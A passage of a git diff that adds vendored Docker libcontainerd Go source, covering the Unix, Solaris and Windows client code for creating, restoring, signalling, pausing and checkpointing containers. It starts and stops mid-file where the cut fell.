containerd, + // we already consumed all the event of the + // container, included the "exit" one. + // Thus, we request all events containerd has in memory for + // this container in order to get the last one (which should + // be an exit event) + logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id) + // Request all events since beginning of time + t := time.Unix(0, 0) + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err) + return nil, err + } + + return clnt.getContainerLastEventSinceTime(id, tsp) + } + + return ev, err +} + +func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { + // Synchronize with live events + clnt.remote.Lock() + defer clnt.remote.Unlock() + // Check that containerd still knows this container. + // + // In the unlikely event that Restore for this container process + // the its past event before the main loop, the event will be + // processed twice. However, this is not an issue as all those + // events will do is change the state of the container to be + // exactly the same. + cont, err := clnt.getContainerdContainer(containerID) + // Get its last event + ev, eerr := clnt.getContainerLastEvent(containerID) + if err != nil || cont.Status == "Stopped" { + if err != nil { + logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err) + } + if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) { + // Wait a while for the exit event + timeout := time.NewTimer(10 * time.Second) + tick := time.NewTicker(100 * time.Millisecond) + stop: + for { + select { + case <-timeout.C: + break stop + case <-tick.C: + ev, eerr = clnt.getContainerLastEvent(containerID) + if eerr != nil { + break stop + } + if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { + break stop + } + } + } + timeout.Stop() + tick.Stop() + } + + // get the exit status for this container, if we don't have + // one, indicate an error + ec := uint32(255) + if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { + ec = ev.Status + } + clnt.setExited(containerID, ec) + + return nil + } + + // container is still alive + if clnt.liveRestore { + if err := clnt.restore(cont, ev, attachStdio, options...); err != nil { + logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err) + } + return nil + } + + // Kill the container if liveRestore == false + w := clnt.getOrCreateExitNotifier(containerID) + clnt.lock(cont.Id) + container := clnt.newContainer(cont.BundlePath) + container.systemPid = systemPid(cont) + clnt.appendContainer(container) + clnt.unlock(cont.Id) + + container.discardFifos() + + if err := clnt.Signal(containerID, int(syscall.SIGTERM)); err != nil { + logrus.Errorf("libcontainerd: error sending sigterm to %v: %v", containerID, err) + } + // Let the main loop handle the exit event + clnt.remote.Unlock() + select { + case <-time.After(10 * time.Second): + if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil { + logrus.Errorf("libcontainerd: error sending sigkill to %v: %v", containerID, err) + } + select { + case <-time.After(2 * time.Second): + case <-w.wait(): + // relock because of the defer + clnt.remote.Lock() + return nil + } + case <-w.wait(): + // relock because of the defer + clnt.remote.Lock() + return nil + } + // relock because of the defer + clnt.remote.Lock() + + clnt.deleteContainer(containerID) + + return clnt.setExited(containerID, uint32(255)) +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + + _, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{ + Id: containerID, + Checkpoint: &containerd.Checkpoint{ + Name: checkpointID, + Exit: exit, + Tcp: true, + UnixSockets: true, + Shell: false, + EmptyNS: []string{"network"}, + }, + CheckpointDir: checkpointDir, + }) + return err +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return err + } + + _, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{ + Id: containerID, + Name: checkpointID, + CheckpointDir: checkpointDir, + }) + return err +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + if _, err := clnt.getContainer(containerID); err != nil { + return nil, err + } + + resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{ + Id: containerID, + CheckpointDir: checkpointDir, + }) + if err != nil { + return nil, err + } + return (*Checkpoints)(resp), nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go new file mode 100644 index 0000000000..cb939975f8 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go @@ -0,0 +1,101 @@ +package libcontainerd + +import "golang.org/x/net/context" + +type client struct { + clientCommon + + // Platform specific properties below here. + remote *remote + q queue + exitNotifiers map[string]*exitNotifier + liveRestore bool +} + +// GetServerVersion returns the connected server version information +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) + if err != nil { + return nil, err + } + + sv := &ServerVersion{ + GetServerVersionResponse: *resp, + } + + return sv, nil +} + +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) { + return -1, nil +} + +func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { + return nil +} + +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + return nil +} + +func (clnt *client) Pause(containerID string) error { + return nil +} + +func (clnt *client) Resume(containerID string) error { + return nil +} + +func (clnt *client) Stats(containerID string) (*Stats, error) { + return nil, nil +} + +func (clnt *client) getExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.RLock() + defer clnt.mapMutex.RUnlock() + return clnt.exitNotifiers[containerID] +} + +func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { + clnt.mapMutex.Lock() + defer clnt.mapMutex.Unlock() + w, ok := clnt.exitNotifiers[containerID] + if !ok { + w = &exitNotifier{c: make(chan struct{}), client: clnt} + clnt.exitNotifiers[containerID] = w + } + return w +} + +// Restore is the handler for restoring a container +func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { + return nil +} + +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + return nil, nil +} + +// Summary returns a summary of the processes running in a container. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + return nil, nil +} + +// UpdateResources updates resources for a running container. +func (clnt *client) UpdateResources(containerID string, resources Resources) error { + // Updating resource isn't supported on Solaris + // but we should return nil for enabling updating container + return nil +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + return nil +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + return nil +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go new file mode 100644 index 0000000000..21e8fea666 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_unix.go @@ -0,0 +1,142 @@ +// +build linux solaris + +package libcontainerd + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/idtools" + specs "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +func (clnt *client) prepareBundleDir(uid, gid int) (string, error) { + root, err := filepath.Abs(clnt.remote.stateDir) + if err != nil { + return "", err + } + if uid == 0 && gid == 0 { + return root, nil + } + p := string(filepath.Separator) + for _, d := range strings.Split(root, string(filepath.Separator))[1:] { + p = filepath.Join(p, d) + fi, err := os.Stat(p) + if err != nil && !os.IsNotExist(err) { + return "", err + } + if os.IsNotExist(err) || fi.Mode()&1 == 0 { + p = fmt.Sprintf("%s.%d.%d", p, uid, gid) + if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) { + return "", err + } + } + } + return p, nil +} + +func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + + if _, err := clnt.getContainer(containerID); err == nil { + return fmt.Errorf("Container %s is already active", containerID) + } + + uid, gid, err := getRootIDs(specs.Spec(spec)) + if err != nil { + return err + } + dir, err := clnt.prepareBundleDir(uid, gid) + if err != nil { + return err + } + + container := clnt.newContainer(filepath.Join(dir, containerID), options...) + if err := container.clean(); err != nil { + return err + } + + defer func() { + if err != nil { + container.clean() + clnt.deleteContainer(containerID) + } + }() + + if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) { + return err + } + + f, err := os.Create(filepath.Join(container.dir, configFilename)) + if err != nil { + return err + } + defer f.Close() + if err := json.NewEncoder(f).Encode(spec); err != nil { + return err + } + + return container.start(checkpoint, checkpointDir, attachStdio) +} + +func (clnt *client) Signal(containerID string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ + Id: containerID, + Pid: InitFriendlyName, + Signal: uint32(sig), + }) + return err +} + +func (clnt *client) newContainer(dir string, options ...CreateOption) *container { + container := &container{ + containerCommon: containerCommon{ + process: process{ + dir: dir, + processCommon: processCommon{ + containerID: filepath.Base(dir), + client: clnt, + friendlyName: InitFriendlyName, + }, + }, + processes: make(map[string]*process), + }, + } + for _, option := range options { + if err := option.Apply(container); err != nil { + logrus.Errorf("libcontainerd: newContainer(): %v", err) + } + } + return container +} + +type exitNotifier struct { + id string + client *client + c chan struct{} + once sync.Once +} + +func (en *exitNotifier) close() { + en.once.Do(func() { + close(en.c) + en.client.mapMutex.Lock() + if en == en.client.exitNotifiers[en.id] { + delete(en.client.exitNotifiers, en.id) + } + en.client.mapMutex.Unlock() + }) +} +func (en *exitNotifier) wait() <-chan struct{} { + return en.c +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go new file mode 100644 index 0000000000..ddcf321c85 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_windows.go @@ -0,0 +1,631 @@ +package libcontainerd + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + "syscall" + + "golang.org/x/net/context" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/sysinfo" + "github.com/opencontainers/runtime-spec/specs-go" +) + +type client struct { + clientCommon + + // Platform specific properties below here (none presently on Windows) +} + +// Win32 error codes that are used for various workarounds +// These really should be ALL_CAPS to match golangs syscall library and standard +// Win32 error conventions, but golint insists on CamelCase. +const ( + CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string + ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started + ErrorBadPathname = syscall.Errno(161) // The specified path is invalid + ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object +) + +// defaultOwner is a tag passed to HCS to allow it to differentiate between +// container creator management stacks. We hard code "docker" in the case +// of docker. +const defaultOwner = "docker" + +// Create is the entrypoint to create a container from a spec, and if successfully +// created, start it too. Table below shows the fields required for HCS JSON calling parameters, +// where if not populated, is omitted. +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | | Isolation=Process | Isolation=Hyper-V | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// | VolumePath | \\?\\Volume{GUIDa} | | +// | LayerFolderPath | %root%\windowsfilter\containerID | %root%\windowsfilter\containerID (servicing only) | +// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | +// | SandboxPath | | %root%\windowsfilter | +// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | +// +-----------------+--------------------------------------------+---------------------------------------------------+ +// +// Isolation=Process example: +// +// { +// "SystemType": "Container", +// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Owner": "docker", +// "IsDummy": false, +// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", +// "IgnoreFlushesDuringBoot": true, +// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "5e0055c814a6", +// "MappedDirectories": [], +// "HvPartition": false, +// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], +// "Servicing": false +//} +// +// Isolation=Hyper-V example: +// +//{ +// "SystemType": "Container", +// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", +// "Owner": "docker", +// "IsDummy": false, +// "IgnoreFlushesDuringBoot": true, +// "Layers": [{ +// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", +// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" +// }], +// "HostName": "475c2c58933b", +// "MappedDirectories": [], +// "SandboxPath": "C:\\\\control\\\\windowsfilter", +// "HvPartition": true, +// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], +// "HvRuntime": { +// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" +// }, +// "Servicing": false +//} +func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + logrus.Debugln("libcontainerd: client.Create() with spec", spec) + + configuration := &hcsshim.ContainerConfig{ + SystemType: "Container", + Name: containerID, + Owner: defaultOwner, + IgnoreFlushesDuringBoot: false, + HostName: spec.Hostname, + HvPartition: false, + } + + if spec.Windows.Resources != nil { + if spec.Windows.Resources.CPU != nil { + if spec.Windows.Resources.CPU.Count != nil { + // This check is being done here rather than in adaptContainerSettings + // because we don't want to update the HostConfig in case this container + // is moved to a host with more CPUs than this one. + cpuCount := *spec.Windows.Resources.CPU.Count + hostCPUCount := uint64(sysinfo.NumCPU()) + if cpuCount > hostCPUCount { + logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) + cpuCount = hostCPUCount + } + configuration.ProcessorCount = uint32(cpuCount) + } + if spec.Windows.Resources.CPU.Shares != nil { + configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) + } + if spec.Windows.Resources.CPU.Percent != nil { + configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000 + } + } + if spec.Windows.Resources.Memory != nil { + if spec.Windows.Resources.Memory.Limit != nil { + configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 + } + } + if spec.Windows.Resources.Storage != nil { + if spec.Windows.Resources.Storage.Bps != nil { + configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps + } + if spec.Windows.Resources.Storage.Iops != nil { + configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops + } + } + } + + var layerOpt *LayerOption + for _, option := range options { + if s, ok := option.(*ServicingOption); ok { + configuration.Servicing = s.IsServicing + continue + } + if f, ok := option.(*FlushOption); ok { + configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot + continue + } + if h, ok := option.(*HyperVIsolationOption); ok { + configuration.HvPartition = h.IsHyperV + configuration.SandboxPath = h.SandboxPath + continue + } + if l, ok := option.(*LayerOption); ok { + layerOpt = l + } + if n, ok := option.(*NetworkEndpointsOption); ok { + configuration.EndpointList = n.Endpoints + configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery + continue + } + if c, ok := option.(*CredentialsOption); ok { + configuration.Credentials = c.Credentials + continue + } + } + + // We must have a layer option with at least one path + if layerOpt == nil || layerOpt.LayerPaths == nil { + return fmt.Errorf("no layer option or paths were supplied to the runtime") + } + + if configuration.HvPartition { + // Find the upper-most utility VM image, since the utility VM does not + // use layering in RS1. + // TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable. + var uvmImagePath string + for _, path := range layerOpt.LayerPaths { + fullPath := filepath.Join(path, "UtilityVM") + _, err := os.Stat(fullPath) + if err == nil { + uvmImagePath = fullPath + break + } + if !os.IsNotExist(err) { + return err + } + } + if uvmImagePath == "" { + return errors.New("utility VM image could not be found") + } + configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} + } else { + configuration.VolumePath = spec.Root.Path + } + + configuration.LayerFolderPath = layerOpt.LayerFolderPath + + for _, layerPath := range layerOpt.LayerPaths { + _, filename := filepath.Split(layerPath) + g, err := hcsshim.NameToGuid(filename) + if err != nil { + return err + } + configuration.Layers = append(configuration.Layers, hcsshim.Layer{ + ID: g.ToString(), + Path: layerPath, + }) + } + + // Add the mounts (volumes, bind mounts etc) to the structure + mds := make([]hcsshim.MappedDir, len(spec.Mounts)) + for i, mount := range spec.Mounts { + mds[i] = hcsshim.MappedDir{ + HostPath: mount.Source, + ContainerPath: mount.Destination, + ReadOnly: false, + } + for _, o := range mount.Options { + if strings.ToLower(o) == "ro" { + mds[i].ReadOnly = true + } + } + } + configuration.MappedDirectories = mds + + hcsContainer, err := hcsshim.CreateContainer(containerID, configuration) + if err != nil { + return err + } + + // Construct a container object for calling start on it. + container := &container{ + containerCommon: containerCommon{ + process: process{ + processCommon: processCommon{ + containerID: containerID, + client: clnt, + friendlyName: InitFriendlyName, + }, + commandLine: strings.Join(spec.Process.Args, " "), + }, + processes: make(map[string]*process), + }, + ociSpec: spec, + hcsContainer: hcsContainer, + } + + container.options = options + for _, option := range options { + if err := option.Apply(container); err != nil { + logrus.Errorf("libcontainerd: %v", err) + } + } + + // Call start, and if it fails, delete the container from our + // internal structure, start will keep HCS in sync by deleting the + // container there. + logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID) + if err := container.start(attachStdio); err != nil { + clnt.deleteContainer(containerID) + return err + } + + logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID) + return nil + +} + +// AddProcess is the handler for adding a process to an already running +// container. It's called through docker exec. It returns the system pid of the +// exec'd process. +func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) { + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return -1, err + } + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. + createProcessParms := hcsshim.ProcessConfig{ + EmulateConsole: procToAdd.Terminal, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: !procToAdd.Terminal, + } + createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width) + + // Take working directory from the process to add if it is defined, + // otherwise take from the first process. + if procToAdd.Cwd != "" { + createProcessParms.WorkingDirectory = procToAdd.Cwd + } else { + createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd + } + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env) + createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ") + createProcessParms.User = procToAdd.User.Username + + logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine) + + // Start the command running in the container. + var stdout, stderr io.ReadCloser + var stdin io.WriteCloser + newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms) + if err != nil { + logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err) + return -1, err + } + + pid := newProcess.Pid() + + stdin, stdout, stderr, err = newProcess.Stdio() + if err != nil { + logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err) + return -1, err + } + + iopipe := &IOPipe{Terminal: procToAdd.Terminal} + iopipe.Stdin = createStdInCloser(stdin, newProcess) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + + proc := &process{ + processCommon: processCommon{ + containerID: containerID, + friendlyName: processFriendlyName, + client: clnt, + systemPid: uint32(pid), + }, + commandLine: createProcessParms.CommandLine, + hcsProcess: newProcess, + } + + // Add the process to the container's list of processes + container.processes[processFriendlyName] = proc + + // Tell the engine to attach streams back to the client + if err := attachStdio(*iopipe); err != nil { + return -1, err + } + + // Spin up a go routine waiting for exit to handle cleanup + go container.waitExit(proc, false) + + return pid, nil +} + +// Signal handles `docker stop` on Windows. While Linux has support for +// the full range of signals, signals aren't really implemented on Windows. +// We fake supporting regular stop and -9 to force kill. +func (clnt *client) Signal(containerID string, sig int) error { + var ( + cont *container + err error + ) + + // Get the container as we need it to get the container handle. + clnt.lock(containerID) + defer clnt.unlock(containerID) + if cont, err = clnt.getContainer(containerID); err != nil { + return err + } + + cont.manualStopRequested = true + + logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid) + + if syscall.Signal(sig) == syscall.SIGKILL { + // Terminate the compute system + if err := cont.hcsContainer.Terminate(); err != nil { + if !hcsshim.IsPending(err) { + logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err) + } + } + } else { + // Terminate Process + if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) { + // ignore errors + logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err) + } + } + + return nil +} + +// While Linux has support for the full range of signals, signals aren't really implemented on Windows. +// We try to terminate the specified process whatever signal is requested. +func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error { + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + for _, p := range cont.processes { + if p.friendlyName == processFriendlyName { + return p.hcsProcess.Kill() + } + } + + return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID) +} + +// Resize handles a CLI event to resize an interactive docker run or docker exec +// window. +func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + h, w := uint16(height), uint16(width) + + if processFriendlyName == InitFriendlyName { + logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid) + return cont.process.hcsProcess.ResizeConsole(w, h) + } + + for _, p := range cont.processes { + if p.friendlyName == processFriendlyName { + logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid) + return p.hcsProcess.ResizeConsole(w, h) + } + } + + return fmt.Errorf("Resize could not find containerID %s to resize", containerID) + +} + +// Pause handles pause requests for containers +func (clnt *client) Pause(containerID string) error { + unlockContainer := true + // Get the libcontainerd container object + clnt.lock(containerID) + defer func() { + if unlockContainer { + clnt.unlock(containerID) + } + }() + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + for _, option := range container.options { + if h, ok := option.(*HyperVIsolationOption); ok { + if !h.IsHyperV { + return errors.New("cannot pause Windows Server Containers") + } + break + } + } + + err = container.hcsContainer.Pause() + if err != nil { + return err + } + + // Unlock container before calling back into the daemon + unlockContainer = false + clnt.unlock(containerID) + + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StatePause, + }}) +} + +// Resume handles resume requests for containers +func (clnt *client) Resume(containerID string) error { + unlockContainer := true + // Get the libcontainerd container object + clnt.lock(containerID) + defer func() { + if unlockContainer { + clnt.unlock(containerID) + } + }() + container, err := clnt.getContainer(containerID) + if err != nil { + return err + } + + // This should never happen, since Windows Server Containers cannot be paused + for _, option := range container.options { + if h, ok := option.(*HyperVIsolationOption); ok { + if !h.IsHyperV { + return errors.New("cannot resume Windows Server Containers") + } + break + } + } + + err = container.hcsContainer.Resume() + if err != nil { + return err + } + + // Unlock container before calling back into the daemon + unlockContainer = false + clnt.unlock(containerID) + + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateResume, + }}) +} + +// Stats handles stats requests for containers +func (clnt *client) Stats(containerID string) (*Stats, error) { + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + s, err := container.hcsContainer.Statistics() + if err != nil { + return nil, err + } + st := Stats(s) + return &st, nil +} + +// Restore is the handler for restoring a container +func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error { + // TODO Windows: Implement this. For now, just tell the backend the container exited. + logrus.Debugf("libcontainerd: Restore(%s)", containerID) + return clnt.backend.StateChanged(containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: 1 << 31, + }}) +} + +// GetPidsForContainer returns a list of process IDs running in a container. +// Although implemented, this is not used in Windows. +func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { + var pids []int + clnt.lock(containerID) + defer clnt.unlock(containerID) + cont, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + + // Add the first process + pids = append(pids, int(cont.containerCommon.systemPid)) + // And add all the exec'd processes + for _, p := range cont.processes { + pids = append(pids, int(p.processCommon.systemPid)) + } + return pids, nil +} + +// Summary returns a summary of the processes running in a container. +// This is present in Windows to support docker top. In linux, the +// engine shells out to ps to get process information. On Windows, as +// the containers could be Hyper-V containers, they would not be +// visible on the container host. However, libcontainerd does have +// that information. +func (clnt *client) Summary(containerID string) ([]Summary, error) { + + // Get the libcontainerd container object + clnt.lock(containerID) + defer clnt.unlock(containerID) + container, err := clnt.getContainer(containerID) + if err != nil { + return nil, err + } + p, err := container.hcsContainer.ProcessList() + if err != nil { + return nil, err + } + pl := make([]Summary, len(p)) + for i := range p { + pl[i] = Summary(p[i]) + } + return pl, nil +} + +// UpdateResources updates resources for a running container. +func (clnt *client) UpdateResources(containerID string, resources Resources) error { + // Updating resource isn't supported on Windows + // but we should return nil for enabling updating container + return nil +} + +func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { + return nil, errors.New("Windows: Containers do not support checkpoints") +} + +func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { + return &ServerVersion{}, nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go new file mode 100644 index 0000000000..b40321389a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container.go @@ -0,0 +1,13 @@ +package libcontainerd + +const ( + // InitFriendlyName is the name given in the lookup map of processes + // for the first process started in a container. + InitFriendlyName = "init" + configFilename = "config.json" +) + +type containerCommon struct { + process + processes map[string]*process +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go new file mode 100644 index 0000000000..61bab145f2 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container_unix.go @@ -0,0 +1,250 @@ +// +build linux solaris + +package libcontainerd + +import ( + "encoding/json" + "io" + "io/ioutil" + "os" + "path/filepath" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/ioutils" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/tonistiigi/fifo" + "golang.org/x/net/context" +) + +type container struct { + containerCommon + + // Platform specific fields are below here. + pauseMonitor + oom bool + runtime string + runtimeArgs []string +} + +type runtime struct { + path string + args []string +} + +// WithRuntime sets the runtime to be used for the created container +func WithRuntime(path string, args []string) CreateOption { + return runtime{path, args} +} + +func (rt runtime) Apply(p interface{}) error { + if pr, ok := p.(*container); ok { + pr.runtime = rt.path + pr.runtimeArgs = rt.args + } + return nil +} + +func (ctr *container) clean() error { + if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" { + return nil + } + if _, err := os.Lstat(ctr.dir); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + if err := os.RemoveAll(ctr.dir); err != nil { + return err + } + return nil +} + +// cleanProcess removes the fifos used by an additional process. +// Caller needs to lock container ID before calling this method. +func (ctr *container) cleanProcess(id string) { + if p, ok := ctr.processes[id]; ok { + for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} { + if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) { + logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err) + } + } + } + delete(ctr.processes, id) +} + +func (ctr *container) spec() (*specs.Spec, error) { + var spec specs.Spec + dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename)) + if err != nil { + return nil, err + } + if err := json.Unmarshal(dt, &spec); err != nil { + return nil, err + } + return &spec, nil +} + +func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio 